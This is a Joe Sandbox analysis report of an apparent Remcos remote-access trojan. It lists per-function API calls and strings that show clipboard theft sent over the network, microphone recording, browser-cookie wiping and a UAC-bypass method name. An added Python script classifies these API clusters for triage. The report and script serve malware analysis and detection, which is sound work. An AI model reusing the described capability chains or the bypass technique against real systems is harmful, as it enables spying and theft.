                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID:
                                              • API String ID: 2172192267-0
                                              • Opcode ID: 59192f27d8259b8bc6892a890a71e090c4d3799982c4e7f0c30143ff3b6776e1
                                              • Instruction ID: 0e2c1c5005fa503350bdaefdc68aa22b7fc3c48b5635ac34c2c644e6846a2f6f
                                              • Opcode Fuzzy Hash: 59192f27d8259b8bc6892a890a71e090c4d3799982c4e7f0c30143ff3b6776e1
                                              • Instruction Fuzzy Hash: 32015E322183109FC318BB74EE5ABEE77B5BF81711F44852EFC16C26A2DF3088859661
                                              APIs
                                              • _free.LIBCMT ref: 00107EBC
                                              • _free.LIBCMT ref: 00107EE0
                                              • _free.LIBCMT ref: 00108067
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0011D478), ref: 00108079
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0013179C,000000FF,00000000,0000003F,00000000,?,?), ref: 001080F1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,001317F0,000000FF,?,0000003F,00000000,?), ref: 0010811E
                                              • _free.LIBCMT ref: 00108233
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID:
                                              • API String ID: 314583886-0
                                              • Opcode ID: e6bb0309952ec8d57a55fdac2c6e4b8e22a121c6bdaec8007f7a01932b3f9659
                                              • Instruction ID: a37964bbec4269b5f01632aab3c18a49398c4785b4f1a621c16bbcf9dd48bce3
                                              • Opcode Fuzzy Hash: e6bb0309952ec8d57a55fdac2c6e4b8e22a121c6bdaec8007f7a01932b3f9659
                                              • Instruction Fuzzy Hash: 5EC12971E08205AFCB24DF74CC41AAE7BB9EF55350F18419AE4D5972D1EBB0AE42CB50
                                              APIs
                                              • CreateWindowExA.USER32(00000000,BUTTON,?,?,00000000,00000000,00000000,00000000,?,FFFFFF37,00000000,00000000), ref: 00438163
                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 0043818B
                                              • SetWindowLongA.USER32(00000000,000000FC,00437AD0), ref: 0043819E
                                              • SetWindowLongA.USER32(00000000,000000EB), ref: 004381A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$Long$Create
                                              • String ID: BUTTON
                                              • API String ID: 1733017098-3405671355
                                              • Opcode ID: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction ID: 5eb1fe1e349d0c2bf26a2ea382cf1488185d3080d212b75d548425cf7d1e2c38
                                              • Opcode Fuzzy Hash: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction Fuzzy Hash: BD718CB1244301AFD314DF69DC81FABB7E9BB88710F10461EF55997391DB78A801CB69
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: aa51c975f4dc6ab1173de034fcd46a94bd4b32de5cdca1c2ab4982a41e2d71f5
                                              • Instruction ID: 0326e167289fa38308331b2c301906776f557a9156b791c7164d4171f58189f0
                                              • Opcode Fuzzy Hash: aa51c975f4dc6ab1173de034fcd46a94bd4b32de5cdca1c2ab4982a41e2d71f5
                                              • Instruction Fuzzy Hash: 38618171D04205EFDB20DF68C842B9ABBF5AB54724F24417AF984EB6D1D7B09D828B90
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409D9D
                                                • Part of subcall function 004092B5: __EH_prolog.LIBCMT ref: 004092BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$Installing$PunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %s$PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %s$Un-installing
                                              • API String ID: 3519838083-4248269577
                                              • Opcode ID: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction ID: 78eb83f452c0a5ae38286d43f464178ba804fbe3ee9df3c1ff42f644fb56a5a3
                                              • Opcode Fuzzy Hash: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction Fuzzy Hash: A0719F70A002499FDB20DF64C894BEAB7F5AF49304F4440BEE149A72E3DB791E84CB59
                                              APIs
                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0010A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0010A105
                                              • __fassign.LIBCMT ref: 0010A180
                                              • __fassign.LIBCMT ref: 0010A19B
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0010A1C1
                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0010A838,00000000,?,?,?,?,?,?,?,?,?,0010A838,?), ref: 0010A1E0
                                              • WriteFile.KERNEL32(?,?,00000001,0010A838,00000000,?,?,?,?,?,?,?,?,?,0010A838,?), ref: 0010A219
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: f1f1dd3dbb8fbb29355e50d949577c3632703f8540b48c20994213093b1ee9ba
                                              • Instruction ID: 748054e894f5f14bdcef2e339211405e7b52f19171a5dcf9cc8ca985db053717
                                              • Opcode Fuzzy Hash: f1f1dd3dbb8fbb29355e50d949577c3632703f8540b48c20994213093b1ee9ba
                                              • Instruction Fuzzy Hash: BE51B3B1E04309AFCB14CFA8D885AEEBBF8FF09300F14416AE995E7291D7719941CB61
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7AAB
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 000F7AB3
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7B41
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 000F7B6C
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7BC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: b2f19f35ccbb66dd921529dc43e3585bd193d18ef9ee56411241be1c87e7fde9
                                              • Instruction ID: 4d97760d50f4a7f320c773b7d16285c03bd4a76c1ebadbdc05693b42ef2d6993
                                              • Opcode Fuzzy Hash: b2f19f35ccbb66dd921529dc43e3585bd193d18ef9ee56411241be1c87e7fde9
                                              • Instruction Fuzzy Hash: C341D230A0420D9BCF10DF68C884BFEBBF5AF46324F1481A5EA195B792D7319A51DB92
                                              APIs
                                              • _strftime.LIBCMT ref: 000C1AD3
                                                • Part of subcall function 000C1BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 000C1C54
                                              • waveInUnprepareHeader.WINMM(00131AC0,00000020,00000000,?), ref: 000C1B85
                                              • waveInPrepareHeader.WINMM(00131AC0,00000020), ref: 000C1BC3
                                              • waveInAddBuffer.WINMM(00131AC0,00000020), ref: 000C1BD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav
                                              • API String ID: 3809562944-3597965672
                                              • Opcode ID: 7de01bacd1d6c90be307fd0c5414fc1de18d70dcfad407404a5acd1289ae87c5
                                              • Instruction ID: 2854220c635cf96cc333f978a5e333ead184ee268cd2f874c4e9953c23d5fc2e
                                              • Opcode Fuzzy Hash: 7de01bacd1d6c90be307fd0c5414fc1de18d70dcfad407404a5acd1289ae87c5
                                              • Instruction Fuzzy Hash: 69316931505240ABC314EB20EC52FEE7BE4AB95311F40882DF556C39E3EF70AA59CB52
                                              APIs
                                                • Part of subcall function 000D2513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                                • Part of subcall function 000D2513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                                • Part of subcall function 000D2513: RegCloseKey.KERNEL32(?), ref: 000D255F
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 000CB76C
                                              • PathFileExistsA.SHLWAPI(?), ref: 000CB779
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API String ID: 1133728706-4073444585
                                              • Opcode ID: 5886607d08b855162aad33007ffb2d543c6d36047581edfb838a4e5367b1b21b
                                              • Instruction ID: 43cc91a9fbbd44cef5e30df886dea89c123276c663ebf4c59f8fc9f975fb5e38
                                              • Opcode Fuzzy Hash: 5886607d08b855162aad33007ffb2d543c6d36047581edfb838a4e5367b1b21b
                                              • Instruction Fuzzy Hash: 94217F31A40228A6CB14F7F0DC67EFE7768AF96310F40015DF902A72C3EF605A5AD695
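The per-function records in the unpacked 000C0000 region are where the RAT's capabilities become legible: ShellExecuteExA followed by WaitForSingleObject and DeleteFileA (self-deletion through a helper in Temp), OpenClipboard/GetClipboardData feeding a send subcall (clipboard exfiltration), CreateFileW/WriteFile/MoveFileW with the ".part" string (download to a temporary name, then rename), waveInPrepareHeader/waveInAddBuffer with a strftime ".wav" name (microphone capture), SendInput with MapVirtualKeyA (synthetic keystrokes) and the User Shell Folders lookup with "Cookies" strings (IE cookie wipe). The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses records in the layout this page uses and maps API clusters to capability labels so that a report of this size can be triaged without reading every record. The rule table, the record delimiter (a record is taken to end at its Instruction Fuzzy Hash line) and SAMPLE, which is constructed from three records on this page, are assumptions of the example.

```python
import re
from dataclasses import dataclass, field

# Section labels used by the per-function records in a Joe Sandbox report.
SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

# Matches "• Name.MODULE(...)" and the indented
# "• Part of subcall function XXXX: Name.MODULE(...)" variant.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")


@dataclass
class Record:
    apis: list = field(default_factory=list)  # (api, module, via_subcall)
    api_id: str = ""
    string_id: str = ""

    def api_names(self) -> set:
        return {api for api, _, _ in self.apis}


def parse_records(text: str) -> list:
    """Split report text into Records; a record ends at its Instruction Fuzzy Hash."""
    records, cur, section = [], Record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:          # section header, not data
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append((m.group(1), m.group(2), "subcall" in line))
        elif section == "Similarity":
            if line.startswith("• API ID:"):
                cur.api_id = line.split(":", 1)[1].strip()
            elif line.startswith("• String ID:"):
                cur.string_id = line.split(":", 1)[1].strip()
            elif line.startswith("• Instruction Fuzzy Hash:"):
                records.append(cur)   # assumed record boundary
                cur, section = Record(), None
    return records


# Assumed capability rules: every API in the set must appear in the record and,
# when string hints are given, at least one hint must occur in its String ID.
RULES = [
    ("self-delete-via-shell", {"ShellExecuteExA", "WaitForSingleObject", "DeleteFileA"}, ()),
    ("clipboard-exfil", {"OpenClipboard", "GetClipboardData", "send"}, ()),
    ("download-to-.part", {"CreateFileW", "WriteFile", "MoveFileW"}, (".part",)),
    ("audio-capture", {"waveInPrepareHeader", "waveInAddBuffer"}, (".wav",)),
    ("keystroke-injection", {"SendInput", "MapVirtualKeyA"}, ()),
    ("ie-cookie-wipe", {"RegOpenKeyExA", "PathFileExistsA"}, ("Cookies",)),
]


def classify(rec: Record) -> list:
    names = rec.api_names()
    return [label for label, need, hints in RULES
            if need <= names and (not hints or any(h in rec.string_id for h in hints))]


def triage(text: str) -> list:
    """Return (API ID, capability labels) for every record that triggers a rule."""
    return [(r.api_id, classify(r)) for r in parse_records(text) if classify(r)]


# Constructed sample: three records trimmed from this report page.
SAMPLE = """\
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00125554), ref: 000D6F24
• DeleteFileA.KERNEL32(00000000), ref: 000D6F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 000D6EF0
  • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
Strings
Memory Dump Source
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$Temp
• Instruction Fuzzy Hash: DA316A319002199BDB18FBA4DD52FEE7776AF52300F40416CF506A62E3EF701A8ACB90
APIs
• OpenClipboard.USER32 ref: 000D5A61
• GetClipboardData.USER32(0000000D), ref: 000D5A71
  • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID:
• Instruction Fuzzy Hash: 32015E322183109FC318BB74EE5ABEE77B5BF81711F44852EFC16C26A2DF3088859661
APIs
• CreateFileW.KERNEL32(00000000,00000004), ref: 000C6C38
• WriteFile.KERNEL32(00000000,?), ref: 000C6C80
• MoveFileW.KERNEL32(00000000,00000000), ref: 000C6CDD
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• Instruction Fuzzy Hash: AF31A071908301AFC324EF20DD85EEFB7E8FB85711F00491DF9C192292DB71AA488B92
"""

if __name__ == "__main__":
    for api_id, caps in triage(SAMPLE):
        print(f"{', '.join(caps):24s} <- {api_id}")
```

Subcall entries are kept as part of the calling record because that is what makes the clipboard and self-delete clusters recognisable: the send happens in a helper at 000C4468, not in the function that reads the clipboard. Feed the script the text of a whole report (or the c0000 snapshot only, since the 400000 region is the PunkBuster installer shell the RAT was packed into) and extend RULES with the clusters that matter for your environment.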
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4124b112eb088853a8c8169e6b3af0c2ce31098a909472dc43c3370ac08d4f6e
                                              • Instruction ID: b9f48a4e70daf3d6537a805c1b3fc82172938bc63d134a796c919c0efa0fe986
                                              • Opcode Fuzzy Hash: 4124b112eb088853a8c8169e6b3af0c2ce31098a909472dc43c3370ac08d4f6e
                                              • Instruction Fuzzy Hash: 30110A7160855DFFCB282F758C44EAB3ABEEFD23747114125F855C72C0DBB4884196A1
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040189B
                                              • GetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 004018D6
                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004018E3
                                              • LocalFree.KERNEL32(?), ref: 00401974
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ErrorFormatFreeH_prologLastLocalMessage
                                              • String ID: **ERROR: %s: %s$Message
                                              • API String ID: 759219404-2348020675
                                              • Opcode ID: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction ID: 6bda246ea51a2eb7aaa526fdd861ceddc48ebf66c57801f6c4823909223e4e6e
                                              • Opcode Fuzzy Hash: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction Fuzzy Hash: B42132B194015CEFDB10EB94CC81EEDB7B8AB04318F5081BAB615621E2D6785B85CF69
                                              APIs
                                                • Part of subcall function 0010FA22: _free.LIBCMT ref: 0010FA4B
                                              • _free.LIBCMT ref: 0010FD29
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 0010FD34
                                              • _free.LIBCMT ref: 0010FD3F
                                              • _free.LIBCMT ref: 0010FD93
                                              • _free.LIBCMT ref: 0010FD9E
                                              • _free.LIBCMT ref: 0010FDA9
                                              • _free.LIBCMT ref: 0010FDB4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                              • Instruction ID: d699a55eaf4566f8723cccd6f64b0d17d509d9ed1e7b1afe24d431d9328b1f34
                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                              • Instruction Fuzzy Hash: AD112931B51718E6E570BBB0CC07FCB77D89B14700F844828B2DE674D6E7A4B5264650
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\4wECQoBvYC.exe), ref: 000C6835
                                                • Part of subcall function 000C6764: _wcslen.LIBCMT ref: 000C6788
                                                • Part of subcall function 000C6764: CoGetObject.OLE32(?,00000024,001259B0,00000000), ref: 000C67E9
                                              • CoUninitialize.OLE32 ref: 000C688E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitializeObjectUninitialize_wcslen
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                              • API String ID: 3851391207-1988668739
                                              • Opcode ID: 27e8fcf2d593bfcb29fbbdcba0f1e4e320af5ed1be57422a46ca6ec4b7aee416
                                              • Instruction ID: 02777f18cbf370e2f5491fb3c7bf12c60b05d1d278bd763a5e142892a89cc661
                                              • Opcode Fuzzy Hash: 27e8fcf2d593bfcb29fbbdcba0f1e4e320af5ed1be57422a46ca6ec4b7aee416
                                              • Instruction Fuzzy Hash: A601CC722057206FE3386B21EC4AFBF36A8DF45725F60022EF540861C1EFA2AC048661
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 000CB2E4
                                              • GetLastError.KERNEL32 ref: 000CB2EE
                                              Strings
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 000CB2AF
                                              • [Chrome Cookies found, cleared!], xrefs: 000CB314
                                              • UserProfile, xrefs: 000CB2B4
                                              • [Chrome Cookies not found], xrefs: 000CB308
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: 87b9c5bca8bec2d7eb81681b3e4eb0ad5b1498a6ca7b11be16150d74dc7f32fb
                                              • Instruction ID: c5138ae5519f2f16148447e43f786da6321b378a6f6514dbd1aec70519d1ee51
                                              • Opcode Fuzzy Hash: 87b9c5bca8bec2d7eb81681b3e4eb0ad5b1498a6ca7b11be16150d74dc7f32fb
                                              • Instruction Fuzzy Hash: C001A4316441149B8B04BBB8EDABEFF7768AF52714F50011DF802972D3FF619B468692
                                              APIs
                                              • AllocConsole.KERNEL32(00134358), ref: 000DBEB9
                                              • ShowWindow.USER32(00000000,00000000), ref: 000DBED2
                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 000DBEF7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$AllocOutputShowWindow
                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                              • API String ID: 2425139147-2527699604
                                              • Opcode ID: 1605e820baed5a4a85541e80171c9d83834da287f53fd66300f5633b36ddf510
                                              • Instruction ID: 86f88854c7b6e18131da08f6ebde347198b6f635a4193e3658da3619f9bf161b
                                              • Opcode Fuzzy Hash: 1605e820baed5a4a85541e80171c9d83834da287f53fd66300f5633b36ddf510
                                              • Instruction Fuzzy Hash: 85018FB1A80308BBCA00FBF09D4BFDE37AC6B24B00F500411B604A75C3DBA4A5548B75
                                              APIs
                                              • __allrem.LIBCMT ref: 000F9789
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F97A5
                                              • __allrem.LIBCMT ref: 000F97BC
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F97DA
                                              • __allrem.LIBCMT ref: 000F97F1
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F980F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                              • Instruction ID: 3be5cca3111a9fd95d487a8bb863f186e2c5358290017dd98008dbba8263a091
                                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                              • Instruction Fuzzy Hash: 40813B72A0070A9BE724AE78CC41BBE73E8AF51764F14413AF651D7AC1EBB0D901DB51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: d7113b5b8da1dd9804a5f3ad3a4b24bb3768bc24eee96f21eb6d1be57c5b6e92
                                              • Instruction ID: 155e01264caa5ebd234401483d427a4d345149d36a920a8eea136b92366b3d15
                                              • Opcode Fuzzy Hash: d7113b5b8da1dd9804a5f3ad3a4b24bb3768bc24eee96f21eb6d1be57c5b6e92
                                              • Instruction Fuzzy Hash: B9513BB2900209ABDB249B68CDC1FBE77A9EF59330F244219FA94971C2DFB1DD018664
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16
                                              • String ID: a/p$am/pm
                                              • API String ID: 3509577899-3206640213
                                              • Opcode ID: 3090eec41fb7608d2e46825d5079eb797cb4455543321b0ca90740b8f140afc5
                                              • Instruction ID: bab6282e719ea93440f938dffb5ecbbeab34847de1488e2b8536ae8ffea21459
